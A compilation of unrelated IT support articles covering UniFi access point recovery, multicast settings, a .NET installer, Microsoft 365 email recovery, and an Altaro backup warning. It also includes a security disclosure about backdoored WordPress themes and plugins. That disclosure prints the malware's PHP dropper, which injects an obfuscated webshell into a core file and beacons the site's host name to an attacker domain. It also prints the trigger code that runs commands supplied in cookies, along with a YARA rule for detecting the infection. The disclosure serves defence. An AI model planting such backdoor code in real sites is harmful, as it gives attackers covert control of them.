Ubiquiti UniFi – TFTP Recovery for Bricked Access Points

Overview

Readers will learn how to properly recover a UniFi Access Point (UAP) using the TFTP method.

Introduction

The method described in this article should help recover a “bricked” UniFi AP. This method will not void the device warranty, whereas opening the chassis for serial TTL will void your warranty. Most soft brick issues will be resolved via this procedure. If your issue continues unresolved, it might indicate a hardware issue that cannot be resolved via software. Feel free to contact support if you believe this to be the case.IMPORTANT:When Recovering UAP Gen1 Devices, The device itself will need approximately 5 minutes to finish recovering after the put command is entered.

TFTP for Windows

1. Prior to beginning the TFTP recovery, download the firmware for the device needed by visiting the UniFi Downloads section. Navigate to the UAP in question using the menu on the left, and find the latest firmware file. Confirm it is a .bin firmware file and not the UniFi Network application software file before downloading.

2. Once the correct firmware has been identified, download it and save it on your computer.

3. Unplug the ethernet cable from the UniFi AP.

4. Using a paperclip press and hold the UniFi AP’s reset button. Make sure you can feel it being depressed by the paperclip. Do not release the button until step 6.

5. While keeping the reset button pressed in, plug the ethernet cable back into the AP. Keep the reset button depressed until you see the device’s LED flashing in upgrade mode (read about LED patterns in this article). This may take up to 25 seconds. User Tip: The UAP will not respond to ping requests while in TFTP recovery mode, but will respond to ARP requests.

6. You may release the reset button. Now the device is in TFTP transfer mode.

7. Set a static IP on your Computer’s NIC. A static IP of 192.168.1.25, a subnet of 255.255.255.0 and gateway of 192.168.1.20 will work.

8. Plug the UniFi PoE injector’s LAN cable directly to your computer.

9. This example uses the Pumpkin TFTP software, which you can download here (clicking link will download the .exe file immediately) and disable the firewall or allow the Pumpkin connection. Click on “Put File”.

10. In “Local Files” browse for the firmware you downloaded and saved previously (in step 1).

11. In the “Remote host” field enter the gateway you had predetermined (192.168.1.20), then click OK.

12. At this point, the file should begin transferring. The firmware will upgrade now and the device will automatically reboot once it has finished. Do not reboot it yourself.

TFTP for Linux & macOS

2. Once the correct firmware has been identified, download it and save it on your computer. You will need to know the exact path to your file, so for this example, we are moving the downloaded firmware file to /Users/username/.

3. Go to System Preferences > Network and set your computer’s network IP address to 192.168.1.25, subnet 255.255.255.0 and gateway 192.168.1.20. User Tip: Take note of what your IP address is before changing it. You will have to revert back to the original IP address on step 12.

4. On macOS Open Applications > Utilities > Terminal and type:

tftp

On Linux, open the command line application of choice and type the following (substituting the bolded path and firmware name for the name of the file you downloaded in step 2 and the path to where it is saved):

tftp -l ~/path/firmware_name.bin -p 192.168.1.20 69

5. A tftp> command prompt will appear. You are ready to reset the AP and connect it to your computer, while it’s in “upgrade mode”.

6. Unplug the ethernet cable from the UniFi AP.

7. Using a paperclip press and hold the UniFi AP’s reset button. Make sure you can feel it being depressed by the paperclip. Do not release the button until step 9.

8. While keeping the reset button pressed in, plug the ethernet cable back into the AP. Keep the reset button depressed until you see the device’s LED flashing in upgrade mode (read about LED patterns in this article). This may take up to 25 seconds. User Tip: The UAP will not respond to ping requests while in TFTP recovery mode, but will respond to ARP requests.

9. You may release the reset button. Now the device is in TFTP transfer mode.

10. On the TFTP command line in Terminal, paste these four lines and hit enter:

connect 192.168.1.20
binary
rexmt 1
timeout 60

Click to copy

11. Type the command put followed by the path to the firmware downloaded in step 2 and hit enter. Following the example mentioned in step 2, something similar to this would be typed into the Terminal window:

put /Users/Alex/BZ.qca956x.v3.9.27.8537.180317.1235.bin

IMPORTANT:Remember you must substitute the bolded path and firmware file name with your own path and file name.

Once it is successful, you will see something like this in the Terminal window (bolded words will be different for each user):

tftp> connect 192.168.1.20 
tftp> binary 
tftp> rexmt 1 
tftp> timeout 60 
tftp> put /path/firmware.bin
Sent x bytes in y seconds

The file should begin transferring at this point. The firmware will upgrade and the device will automatically reboot once it has finished. Do not reboot it yourself.

12. Re-connect the PoE injector’s LAN cable into your router. Restore the network IP back to what it was before.User Tip: If your device is having trouble getting adopted by the UniFi Network application after this process, try forgetting the device by going to the UniFiDevices section, clicking on the UAP in question and then within the properties panel that pops up, go to Config (gear icon) > Manage Device > Forget this device. Click on the “Forget” button and try the process again.

Source :
https://help.ui.com/hc/en-us/articles/204910124-UniFi-TFTP-Recovery-for-Bricked-Access-Points

Ubiquiti Best Practices for Managing AirPlay Chromecast on UniFi Network

This article explains best practices for configuring larger UniFi networks with AirPlay/Chromecast devices. For efficient and reliable channel utilization, networks with more than 100 WiFi clients will need the multicast block option to be enabled on each of their SSIDs. This guide is especially useful for schools, stadiums, public venues, or similar networks.

Note: This guide applies to a network with a UniFi Security Gateway, UDM, or UDM-Pro. If your network does not have one of these, the steps may need to be adapted.

Creating a ChromeCast/AirPlay Network

Once your UniFi Network scales beyond a certain number of WiFi clients, it is important to ensure that every AP’s WiFi channel continues to be used efficiently. The broadcast traffic from more than 100 clients is typically high enough that WiFi performance may start to degrade. We always recommend enabling the multicast block option setting for larger networks.

However, this option causes a problem with users that would like to use their ChromeCast/AirPlay devices on the same WiFi network, because those devices will no longer hear the MDNS broadcasts from other devices on the network. They will no longer be discoverable.

In order to gain the performance benefits of multicast block while still maintaining discoverability to these WiFi clients, please follow these steps:

Go to Settings > WiFi and select on the SSID to check that multicast block is enabled if it has more than 100 clients on it.
Create a separate SSID/VLAN for the ChromeCast/AirPlay clients.
1. Go to Settings > Networks, and add a New Network.
2. Go to Settings > WiFi, and add a new WiFi Network, ensuring that the Network from Step “a” is selected, instead of LAN.
3. Go to Settings > Advanced Features > Advanced Gateway Settings > Multicast DNS and enable Multicast DNS, then click Apply Changes.
Forget the old network on your ChromeCast/AirPlay clients and connect them to the new WiFi Network.
Test Discoverability from the appropriate mobile apps.

Source :
https://help.ui.com/hc/en-us/articles/4409866388887-Best-Practices-for-Managing-AirPlay-Chromecast-on-UniFi-Network

Microsoft .NET Framework 4.7.2 offline installer for Windows

About Microsoft .NET Framework 4.7.2

Microsoft .NET Framework 4.7.2 is a highly compatible, in-place update to .NET Framework 4, 4.5, 4.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, and 4.7.1.

The offline package can be used in situations in which the web installer cannot be used because of a lack of Internet connectivity. This package is larger than the web installer and does not include the language packs. We recommend that you use the web installer instead of the offline installer for optimal efficiency and bandwidth requirements.
When you install this package, the following packages or updates are installed per your operating system:
- In Windows 7 Service Pack 1 (SP1) and Windows Server 2008 R2 SP1, .NET Framework 4.7.2 is listed as an installed product under the Programs and Features item in Control Panel.
- In Windows Server 2012, Update for Microsoft Windows (KB4054542) is listed under the Installed Updates item in Control Panel.
- In Windows 8.1 or Windows Server 2012 R2, Update for Microsoft Windows (KB4054566) is displayed under the Installed Updates item in Control Panel.
- In Windows 10 Anniversary Update (version 1607), Windows 10 Creators Update (version 1703) and Windows Server 2016, Update for Microsoft Windows (KB4054590) is listed under the Installed Updates item in Control Panel.
- In Windows 10 Fall Creators Update (version 1709), Update for Microsoft Windows (KB4073120) is listed under the Installed Updates item in Control Panel.

Microsoft .NET Framework 4.7.2 is available on Windows Update and on Windows Server Update Service (WSUS). It will be offered as a recommended update on Windows Update.

Note The package installer (NDP472-KB4054530-x86-x64-AllOS-ENU.exe) was updated on July 10, 2018. If you downloaded the installer before July 10, 2018, we recommend that you download the latest version (4.7.3081.0) of the installer to get the additional fixes included in the update.

Download information

The following files are available for download from the Microsoft Download Center:

For all Windows operating systems except Windows RT 8.1:

Download the Microsoft .NET Framework 4.7.2 offline installer package now.
For Windows RT 8.1:

Download the Microsoft .NET Framework 4.7.2 package now.

For information about how to download Microsoft support files, see How to obtain Microsoft support files from online services.

Virus-scan claim

Issues that are fixed in this update

The following issues are fixed for .NET Framework 4.7.2.

SQL Server (SQL)

Fixes an issue in which the .NET Framework API SqlConnection.ConnectionString property is used to set a null or empty connection string. In this situation, a Null Reference Exception (NRE) occurs when you use the API together with .NET Framework 4.7.2. [611802, System.Data.dll, Bug]
Fixes an issue in which you connect to Azure SQL DB and MultipleActiveResultSets=true is used in the connection string together with System.Data.SqlClient.SqlConnection. In this situation, the async query operations cause a bad TDS protocol request stream to be sent from the client. This causes the Async Query APIs to fail. [620109, System.Data.dll , Bug]

Windows Presentation Framework (WPF)

Adds an AppContext switch that opts out of some work that was done during AppDomain or process shutdown. This issue can reduce (but not eliminate) the possibility of a crash in applications that make unwarranted assumptions about the timing of the finalizer thread. [593963, WindowsBase.dll, Bug]
Fixes a crash in WPF that occurs when you multiple characters are replaced by a single character (in a different language than the original text) by using IMEPad. [605996, PresentationFramework.dll, Bug]
Combo box grouped items now report children correctly through UIAutomation. [605922, PresentationFramework.dll, Bug]

More information

This version of .NET Framework runs side-by-side with .NET Framework 3.5 SP1 and earlier versions. However, it performs an in-place update for .NET Framework 4, 4.5, 4.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, and 4.7.1.

Known issues

Applications that rely on .NET Framework to initialize a COM component and that run with restricted permissions may fail to start or run correctly, and return “access denied,” “class not registered,” or “internal failure occurred for unknown reasons” errors.
For known issues with .NET Framework 4.7.2 see Known issues for .NET Framework 4.7.2.

Command-line switches for this update

For more information about the various command-line options that are supported by this update, see the “Command-Line options” section in .NET Framework Deployment Guide for Developers.

Restart requirement

You may have to restart the computer after you install this update. We recommend that you exit all applications that are using .NET Framework before you install this update.

Supported operating systems

Microsoft .NET Framework 4.7.2 (Offline Installer) supports the following operating systems:

Windows Server 2016 (version 1709)
Windows 10 Anniversary Update (version 1607) (x86 and x64)
Windows 10 Creators Update (version 1703) (x86 and x64)
Windows 10 Fall Creators Update (version 1709) (x86 and x64)
Windows Server 2012 R2 (x64)
Windows 8.1 (x86 and x64)
Windows Server 2012 (x64)
Windows Server 2008 R2 Service Pack 1 (x64)
Windows 7 Service Pack 1 (x86 and x64)

Source :
https://support.microsoft.com/en-us/topic/microsoft-net-framework-4-7-2-offline-installer-for-windows-05a72734-2127-a15d-50cf-daf56d5faec2

How to Recover Deleted Emails in Microsoft 365

When the CEO realizes they deleted a vital email thread three weeks ago, email recovery becomes suddenly becomes an urgent task. Sure, you can look in the Deleted Items folder in Outlook, but beyond that, how can you recover what has undergone “permanent” deletion? In this article, we review how you can save the day by bringing supposedly unrecoverable email back from the great beyond.

Deleted Email Recovery in Microsoft And Office 365

Email Recovery for Outlook in Exchange Online through Microsoft and Office can be as simple as dragging and dropping the wayward email from the Deleted Items folder to your Inbox. But what do you do when you can’t find the email you want to recover?

First, let’s look at how email recovery is structured in Microsoft 365. There are few more layers here than you might think! In Microsoft 365, deleted email can be in one of three states: Deleted, Soft-Deleted, or Hard-Deleted. The way you recover email and how long you have to do so depends on the email’s delete status and the applicable retention policy.

Let’s walk through the following graphic and talk about how email gets from one state to another, the default policies, how to recover deleted email in each state, and a few tips along the way.

Items vs. Email

Outlook is all about email yet also has tasks, contacts, calendar events, and other types of information. For example, you can delete calendar entries and may be called on to recover them, just like email. For this reason, the folder for deleted content is called “Deleted Items.” Also, when discussing deletions and recovery, it is common to refer to “items” rather than limiting the discussion to just email.

Policy

Various rules control the retention period for items in the different states of deletion. A policy is an automatically applied action that enforces a rule related to services. Microsoft 365 has hundreds of policies you can tweak to suit your requirements. See Overview of Retention policies for more information.

‘Deleted Items’ Email

When you press the Delete key on an email in Outlook, it’s moved to the Deleted Items folder. That email is now in the “Deleted” state, which simply means it moved to the Deleted Items folder. How long does Outlook retain deleted email? By default – forever! You can recover your deleted mail with just a drag and drop to your Inbox. Done!

If you can’t locate the email in the Deleted Items folder, double-check that you have the Deleted Items folder selected, then scroll to the bottom of the email list. Look for the following message:

If you see the above message, your cache settings may be keeping only part of the content in Outlook and rest in the cloud. The cache helps to keep mailbox sizes lower on your hard drive, which in turn speeds up search and load times. Click on the link to download the missing messages.

But I Didn’t Delete It!

If you find content in the Deleted Items and are sure you did not delete it, you may be right! Administrators can set Microsoft 365 policy to delete old Inbox content automatically.

Mail can ‘disappear’ another way. Some companies enable a personal archive mailbox for users. When enabled, by default, any mail two years or older will “disappear” from your Inbox and the Deleted Items folder. However, there is no need to worry. While apparently missing, the email has simply moved to the Archives Inbox. A personal Archives Inbox shows up as a stand-alone mailbox in Outlook, as shown below.

As a result, it’s a good idea to search the Archives Inbox, if it is present when searching for older messages.

Another setting to check is one that deletes email when Outlook is closed. Access this setting in Outlook by clicking “File,” then “Options,” and finally “Advanced” to display this window:

If enabled, Outlook empties the Deleted Items when closed. The deleted email then moves to the ‘soft-delete’ state, which is covered next. Keep in mind that with this setting, all emails will be permanently deleted after 28 days

‘Soft-Deleted’ Email

The next stage in the process is Soft-Deleted. Soft-Deleted email is in the Deleted-Items folder but is still easily recovered. At a technical level, the mail is deleted locally from Outlook and placed in the Exchange Online folder named Deletions, which is a sub-folder of Recoverable Items. Any content in Recoverable Items folder in Exchange Online is, by definition, considered soft-deleted.

You have, by default, 14 days to recover soft-deleted mail. The service administrator can change the retention period to a maximum of 30 days. Be aware that this can consume some of the storage capacity assigned to each user account and you could get charged for overages.

How items become soft-deleted

There are three ways to soft-delete mail or other Outlook items.

Delete an item already in the Deleted Items folder. When you manually delete something that is already in the Deleted Items folder, the item is soft-deleted. Any process, manual or otherwise that deletes content from this folder results in a ‘soft-delete’
Pressing Shift + Delete on an email in your Outlook Inbox will bring up a dialog box asking if you wish to “permanently” delete the email. Clicking Yes will remove the email from the Deleted-Items folder but only perform a soft-delete. You can still recover the item if you do so within the 14 day retention period.

The final way items can be soft-deleted is by using Outlook policies or rules. By default, there are no policies that will automatically remove mail from the Deleted-Items folder in Outlook. However, users can create rules that ‘permanently’ (soft-delete) email. If you’re troubleshooting missing email, have the user check for such rules as shown below. You can click Rules on the Home menu and examine any created rules in the Rules Wizard shown below.

Note that the caution is a bit misleading as the rule’s action will soft-delete the email, which, as already stated, is not an immediate permanent deletion.

Recovering soft-deleted mail

You can recover soft-deleted mail directly in Outlook. Be sure the Deleted Items folder is selected, then look for “Recover items recently removed from this folder“ at the top of the mail column, or the “Recover Deleted Items from Server” action on the Home menu bar.

Clicking on the recover items link opens the Recover Deleted Items window.

Recover Deleted Items, Microsoft Outlook

Click on the items you want to recover or Select All, and click OK.

NOTE: The recovered email returns to your Deleted Items folder. Be sure to move it into your Inbox.

If the email you’re looking for is not listed, it could have moved to the next stage: ‘Hard-Deleted.’

While users can recover soft-deleted email, Administrators can also recover soft-deleted email on their behalf using the ‘Hard-Deleted’ email recovery process described next (which works for both hard and soft deletions). Also, Microsoft has created two PowerShell commands very useful in this process for those who would rather script the tasks. You can use the Get-RecoverableItems and Restore-RecoverableItems cmdlets to search and restore soft-deleted email.

Hard-Deleted Email

The next stage for deletion is ‘Hard Delete.’ Technically, items are hard deleted when items moved from the Recoverable folder to the Purges folder in Exchange online. Administrators can still recover items in the folder with the recovery period set by policy which ranges from 14 (the default) to 30 (the maximum). You can extend the retention beyond 30 days by placing legal or litigation hold on the item or mailbox.

How items become Hard-Deleted

There are two ways content becomes hard-deleted.

By policy, soft-deleted email is moved to the hard-deleted stage when the retention period expires.
Users can hard-delete mail manually by selecting the Purge option in the Recover Deleted Items window shown above. (Again, choosing to ‘permanently delete’ mail with Shift + Del, results in a soft-delete, not a hard-delete.)

Recovering Hard-Deleted Mail

Once email enters the hard-delete stage, users can no longer recover the content. Only service administrators with the proper privileges can initiate recovery, and no administrators have those privileges by default, not even the global admin. The global admin does have the right to assign privileges so that they can give themselves (or others) the necessary rights. Privacy is a concern here since administrators with these privileges can search and export a user’s email.

Microsoft’s online documentation Recover deleted items in a user’s mailbox details the step-by-step instructions for recovering hard-deleted content. The process is a bit messy compared to other administrative tasks. As an overview, the administrator will:

Assign the required permissions
Search the Inbox for the missing email
Copy the results to a Discovery mailbox where you can view mail in the Purged folder (optional).
Export the results to a PST file.
Import the PST to Outlook on the user’s system and locate the missing email in the Purged folder

Last Chance Recovery

Once hard-deleted items are purged, they are no longer discoverable by any method by users or administrators. You should consider the recovery of such content as unlikely. That said, if the email you are looking for is not recoverable by any of the above methods, you can open a ticket with Microsoft 365 Support. In some circumstances, they may be able to find the email that has been purged but not yet overwritten. They may or may not be willing to look for the email, but it can’t hurt to ask, and it has happened.

What about using Outlook to backup email?

Outlook does allow a user to export email to a PST file. To do this, click “File” in the Outlook main menu, then “Import & Export” as shown below.

You can specify what you want to export and even protect the file with a password.

While useful from time to time, a backup plan that depends on users manually exporting content to a local file doesn’t scale and isn’t reliable. Consequently, don’t rely on this as a possible backup and recovery solution.

Alternative Strategies

After reading this, you may be thinking, “isn’t there an easier way?” A service like Altaro Office 365 Backup allows you to recover from point-in-time snapshots of an inbox or other Microsoft 365 content. Having a service like this when you get that urgent call to recover a mail from a month ago can be a lifesaver.

Summary

Users can recover most deleted email without administrator intervention. Often, deleted email simply sits in the Deleted folder until manually cleared. When that occurs, email enters the ‘soft-deleted stage,’ and is easily restored by a user within 14-days. After this period, the item enters the ‘hard-deleted’ state. A service administrator can recover hard-deleted items within the recovery window. After the hard-deleted state, email should be considered uncoverable. Policies can be applied to extend the retention times of deleted mail in any state. While administrators can go far with the web-based administration tools, the entire recovery process can be scripted with PowerShell to customize and scale larger projects or provide granular discovery. It is always a great idea to use a backup solution designed for Microsoft 365, such as Altaro Office 365 Backup.

Source :
https://www.altaro.com/hyper-v/recover-emails-microsoft-365/

Backdoor Found in Themes and Plugins from AccessPress Themes

While investigating a compromised site we discovered some suspicious code in a theme by AccessPress Themes (aka Access Keys), a vendor with a large number of popular themes and plugins. On further investigation, we found that all the themes and most plugins from the vendor contained this suspicious code, but only if downloaded from their own website. The same extensions were fine if downloaded or installed directly from the WordPress.org directory.

Due to the way the extensions were compromised, we suspected an external attacker had breached the website of AccessPress Themes in an attempt to use their extensions to infect further sites.

We contacted the vendor immediately, but at first we did not receive a response. After escalating it to the WordPress.org plugin team, our suspicions were confirmed. AccessPress Themes websites were breached in the first half of September 2021, and the extensions available for download on their site were injected with a backdoor.

Once we had established a channel for communicating with the vendor, we shared our detailed findings with them. They immediately removed the offending extensions from their website.

Most of the plugins have since been updated, and known clean versions are listed towards the bottom of this post. However, the affected themes have not been updated, and are pulled from the WordPress.org theme repository. If you have any of the themes listed towards the bottom of this post installed on your site, we recommend migrating to a new theme as soon as possible.

This disclosure concerns a large number of extensions, both plugins and themes. Skip to the list below, or read on for the details.

Details:

Vendor: AccessPress Themes
Vendor url: https://accesspressthemes.com
Plugins: multiple
Themes: multiple
CVE: CVE-2021-24867

Analysis:

The infected extensions contained a dropper for a webshell that gives the attackers full access to the infected sites. The dropper is located in the file inital.php located in the main plugin or theme directory. When run it installs a cookie based webshell in wp-includes/vars.php. The shell is installed as a function just in front of the wp_is_mobile() function with the name of wp_is_mobile_fix(). This is presumably to not arouse suspicion to anybody casually scrolling through the vars.php file.

123456789101112131415161718192021 function makeInit() { $b64 = 'ba' . 'se64' . '_dec' . 'ode'; $b = 'ZnVuY3Rpb2........TsKCg=='; $f = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/vars.php'; if(file_exists($f)) { $fp = 0777 & @fileperms($f); $ft = @filemtime($f); $fc = @file_get_contents($f); if(strpos($fc, 'wp_is_mobile_fix') === false) { $fc = str_replace('function wp_is_mobile()', $b64($b) . 'function wp_is_mobile()', $fc); @file_put_contents($f, $fc); @touch($f, $ft); @chmod($f, $fp); } return true; } return false;}

Once the shell is installed, the dropper will phone home by loading a remote image from the URL hxxps://www.wp-theme-connect.com/images/wp-theme.jpg with the url of the infected site and information about which theme it uses as query arguments. Finally, it will remove the dropper source file to avoid detection when the request is finished executing.

12345678910111213 function finishInit() { unlink(__FILE__);} add_action( 'admin_notices', 'wp_notice_plug', 20 );if ( !function_exists( 'wp_notice_plug' ) ) { function wp_notice_plug() { echo '<img style="display: none;" src="https://www.wp-theme-connect.com/images/wp-theme.jpg?ph=' . $_SERVER["HTTP_HOST"] . '&phn=accesspress-anonymous-post">'; } }register_shutdown_function('finishInit');

The webshell itself triggers if the user agent string in the request is wp_is_mobile and the request contains eight specific cookies. It pieces together and executes a payload from these supplied cookies.

1234567 $is_wp_mobile = ($_SERVER['HTTP_USER_AGENT'] == 'wp_is_mobile');$g = $_COOKIE; (count($g) == 8 && $is_wp_mobile) ?(($qr = $g[33].$g[32]) && ($iv = $qr($g[78].$g[18])) &&($_iv = $qr($g[12].$g[17])) && ($_iv = @$iv($g[10], $_iv($qr($g[53])))) && @$_iv()) : $g;

We have also seen another, presumably older, variant of the backdoor directly embedded in the theme/plugin’s functions.php file. This variant uses the same mechanism with piecing together the payload from eight cookies, but does not filter on the request’s user agent string.

To ensure that the dropper is executed, the main plugin file (for plugins) or the functions.php file (for themes) have been modified with code to execute the inital.php file if it exists.

123456789 if(is_admin()) { add_action( "init", 'apap_plugin_check' );} function apap_plugin_check(){ if(file_exists(__DIR__ . "/inital.php")){ include(__DIR__ . "/inital.php"); }}

One striking detail from the timestamps of the compromised plugins is that they are all from early September. The majority are from September 6 and 7, with a few files from September 2 and 3. Similarly for the themes, all were compromised on September 22, except accessbuddy on September 9.

Also, the timestamps within the zip-archives are very uniform, with almost all files with the exact same timestamp, except for the modified main plugin file and the added dropper file that is stamped a few minutes later (usually about 2-5 minutes after the other files in the archive).

Looking at the timestamps for the zip-files downloaded from the wordpress.org repository however, we find a distribution of timestamps corresponding to when plugin/theme was actually updated. Also the distribution of timestamps within the archive is less uniform and reflects which files were updated in the release, and which are unchanged from an older release.

This suggests to us that the files from the AccessPress Themes’ website were modified intentionally, and as a coordinated action after they were originally released. The compromise seems to have been performed in two stages, one for the plugins and a later one for the themes. Each of them with some earlier attempts, possibly to fine tune the process.

Our investigation has only looked at the themes and plugins freely available from the AccessPress Themes’ website. We assume their paid pro themes are affected similarly, but we have not examined these. If you have any of these, please contact AccessPress Themes’ support for further advice.

Affected themes

If you have any of the themes below installed on your site, we recommend migrating to another theme as soon as you’re able to. AccessPress Themes has not yet provided any updates for any of these, and they have been pulled from the WordPress.org repository.

Theme slug	Version
accessbuddy	1.0.0
accesspress-basic	3.2.1
accesspress-lite	2.92
accesspress-mag	2.6.5
accesspress-parallax	4.5
accesspress-ray	1.19.5
accesspress-root	2.5
accesspress-staple	1.9.1
accesspress-store	2.4.9
agency-lite	1.1.6
aplite	1.0.6
bingle	1.0.4
bloger	1.2.6
construction-lite	1.2.5
doko	1.0.27
enlighten	1.3.5
fashstore	1.2.1
fotography	2.4.0
gaga-corp	1.0.8
gaga-lite	1.4.2
one-paze	2.2.8
parallax-blog	3.1.1574941215
parallaxsome	1.3.6
punte	1.1.2
revolve	1.3.1
ripple	1.2.0
scrollme	2.1.0
sportsmag	1.2.1
storevilla	1.4.1
swing-lite	1.1.9
the-launcher	1.3.2
the-monday	1.4.1
uncode-lite	1.3.1
unicon-lite	1.2.6
vmag	1.2.7
vmagazine-lite	1.3.5
vmagazine-news	1.0.5
zigcy-baby	1.0.6
zigcy-cosmetics	1.0.5
zigcy-lite	2.0.9

Table 1: Themes and versions compromised by the attack.

Affected plugins

If you have any of the following plugins with a version number in the Bad column installed on your site, we do recommend to upgrade to the version in the Clean column immediately. It’s worth noting that the plugins installed through WordPress.org are clean, even if they are listed in the Bad column. We still recommend upgrading to the known clean version to be on the safe side.

Plugins with no version number in the Clean column have not yet been upgraded, and we recommend replacing it with other plugins if at all possible.

Plugin slug	Bad	Clean	Note
accesspress-anonymous-post	2.8.0	2.8.1	1
accesspress-custom-css	2.0.1	2.0.2
accesspress-custom-post-type	1.0.8	1.0.9
accesspress-facebook-auto-post	2.1.3	2.1.4
accesspress-instagram-feed	4.0.3	4.0.4
accesspress-pinterest	3.3.3	3.3.4
accesspress-social-counter	1.9.1	1.9.2
accesspress-social-icons	1.8.2	1.8.3
accesspress-social-login-lite	3.4.7	3.4.8
accesspress-social-share	4.5.5	4.5.6
accesspress-twitter-auto-post	1.4.5	1.4.6
accesspress-twitter-feed	1.6.7	1.6.8
ak-menu-icons-lite		1.0.9
ap-companion		1.0.7	2
ap-contact-form	1.0.6	1.0.7
ap-custom-testimonial	1.4.6	1.4.7
ap-mega-menu	3.0.5	3.0.6
ap-pricing-tables-lite	1.1.2	1.1.3
apex-notification-bar-lite	2.0.4	2.0.5
cf7-store-to-db-lite	1.0.9	1.1.0
comments-disable-accesspress	1.0.7	1.0.8
easy-side-tab-cta	1.0.7	1.0.8
everest-admin-theme-lite	1.0.7	1.0.8
everest-coming-soon-lite	1.1.0	1.1.1
everest-comment-rating-lite	2.0.4	2.0.5
everest-counter-lite	2.0.7	2.0.8
everest-faq-manager-lite	1.0.8	1.0.9
everest-gallery-lite	1.0.8	1.0.9
everest-google-places-reviews-lite	1.0.9	2.0.0
everest-review-lite	1.0.7
everest-tab-lite	2.0.3	2.0.4
everest-timeline-lite	1.1.1	1.1.2
inline-call-to-action-builder-lite	1.1.0	1.1.1
product-slider-for-woocommerce-lite	1.1.5	1.1.6
smart-logo-showcase-lite	1.1.7	1.1.8
smart-scroll-posts	2.0.8	2.0.9
smart-scroll-to-top-lite	1.0.3	1.0.4
total-gdpr-compliance-lite	1.0.4
total-team-lite	1.1.1	1.1.2
ultimate-author-box-lite	1.1.2	1.1.3
ultimate-form-builder-lite	1.5.0	1.5.1
woo-badge-designer-lite	1.1.0	1.1.1
wp-1-slider	1.2.9	1.3.0
wp-blog-manager-lite	1.1.0	1.1.2
wp-comment-designer-lite	2.0.3	2.0.4
wp-cookie-user-info	1.0.7	1.0.8
wp-facebook-review-showcase-lite		1.0.9
wp-fb-messenger-button-lite		2.0.7
wp-floating-menu	1.4.4	1.4.5
wp-media-manager-lite	1.1.2	1.1.3
wp-popup-banners	1.2.3	1.2.4
wp-popup-lite	1.0.8
wp-product-gallery-lite	1.1.1

Table 2: Plugins, versions compromised by the attack as well as known clean versions,

Notes:

This plugin has not been updated, but is believed to be clean as the version on the AccessPress Themes website was an older version.
This plugin has not been updated, but is believed to be clean as it was not originally available on the AccessPress Themes website.

IOC’s

The following YARA rule can be used to check if the site has been infected. It will detect both the dropper part of the infection as well as the installed webshell.

123456789101112131415161718192021222324 rule accesspress_backdoor_infection{strings: // IoC's for the dropper $inject0 = "$fc = str_replace('function wp_is_mobile()'," $inject1 = "$b64($b) . 'function wp_is_mobile()'," $inject2 = "$fc);" $inject3 = "@file_put_contents($f, $fc);" // IoC's for the dumped payload $payload0 = "function wp_is_mobile_fix()" $payload1 = "$is_wp_mobile = ($_SERVER['HTTP_USER_AGENT'] == 'wp_is_mobile');" $payload2 = "$g = $_COOKIE;" $payload3 = "(count($g) == 8 && $is_wp_mobile) ?" $url0 = /https?:\/\/(www\.)?wp\-theme\-connect\.com(\/images\/wp\-theme\.jpg)?/ condition: all of ( $inject* ) or all of ( $payload* ) or $url0}

Recommendations

If you have any themes or plugins installed directly from AccessPress Themes or any other place except WordPress.org, you should upgrade immediately to a safe version as indicated in the tables above. If no safe version is available, replace it with the latest version from WordPress.org.

Please note that this does not remove the backdoor from your system, so in addition you need to reinstall a clean version of WordPress to revert the core file modifications done during installation of the back door.

If you have a paid theme or plugin from AccessPress Themes/Access Keys, we advise contacting their support for help.

We strongly recommend that you have a security plan for your site that includes malicious file scanning and backups. Jetpack Security is one great WordPress security option to ensure your site and visitors are safe. Jetpack Scan has detected all variants of this back door and the dropper since September 30.

Timeline

2021-09-22: Jetpack Scan team discovers the dropper and back door in the FotoGraphy theme, and tries to contact vendor about the initial finding.

2021-09-27: Confirm presence of dropper + back door in all current free plugins and themes downloaded from vendors website.

2021-09-28: Confirm that dropper + back door is not present on downloads from wordpress.org

2021-09-29: Trying to contact vendor again, with updates on new findings.

2021-10-14: Escalated to WordPress plugins team to try to obtain contact with the vendor.

2021-10-15: Compromised extensions are removed from the vendor’s site.

2021-10-16: Response from vendor

2022-01-17: Most plugins have been upgraded to new versions, themes have been pulled from WordPress.org.

2022-01-18 Public disclosure

Source :
https://jetpack.com/2022/01/18/backdoor-found-in-themes-and-plugins-from-accesspress-themes/

Altaro The backup snapshot for this VM is not application consistent. The backup will proceed in crash-consistent mode. (Error code ‘RCTCONTROLLER_011’)

APPLIES TO

Windows Server 2016 Hosts or newer

PROBLEM

Backup completes but gives a warning that it “The backup snapshot for this VM is not application consistent. The backup will proceed in crash-consistent mode. (Error code ‘RCTCONTROLLER_011’)”

SOLUTION

The Microsoft Volume Shadow Service (VSS) is Microsoft technology that forms part of Windows Server 2008 R2. This component allows applications to access a “point in time” snapshot of a logical drive on the host machine, including any VHDX and related virtual machine files on that drive. This enables these files to be accessed even if they are in use or locked. It also ensures that the VHDX and related files are in a consistent state and all data has been flushed to disk before they are accessed for backup purposes.

Going forward, Microsoft have made improvements to this technology and in Server 2016 and newer they have changed the way it works once again. Now they’re using “Production Checkpoints” as a gateway between backup applications and the operating system. VSS exists to address the fact that data can and does change while backups are being taken.

In fact if you’re getting this warning through Altaro VM Backup, you’ll see that you will also get this when running a Production Checkpoint. In order to run a production checkpoint as opposed to a standard one, you can follow the steps below:

Go to Hyper-V Manager
Right-click on the VM > Settings
Go to Checkpoints
Un-tick the option “Create standard checkpoints if it’s not possible to create a production checkpoint”
Apply and OK
Right-click on the VM “Checkpoint”

The checkpoint operation should now fail, the reason being because it didn’t manage to run VSS inside the VM and tell applications to cease all I/O and flush outstanding data and operations from memory to disk so that the backup doesn’t miss anything. VSS in general is broad and can be affected by any application running inside the VM.

With that said, this means that it’s not always easy or straight-forward to resolve a ‘crash-consistent’ backup, however you should proceed to troubleshoot as follows:

Firstly, check whether your VM actually requires an Application-Consistent backup. If it does not, you can disable it from the “VSS Settings” screen. Simply uncheck “Application Consistent” and Save changes. More information here.
If your VM is running a non-VSS aware guest, such as a Linux OS, you can simply go to “VSS Settings” and disable “Application Consistent” for these VM’s.
The Guest must be running one of the supported OS’s of Server 2016 as the following link: https://technet.microsoft.com/en-gb/windows-server-docs/compute/hyper-v/supported-windows-guest-operating-systems-for-hyper-v-on-windows
Ensure you have the latest Windows Updates installed as “Integration Services” are now being deployed through the updates.
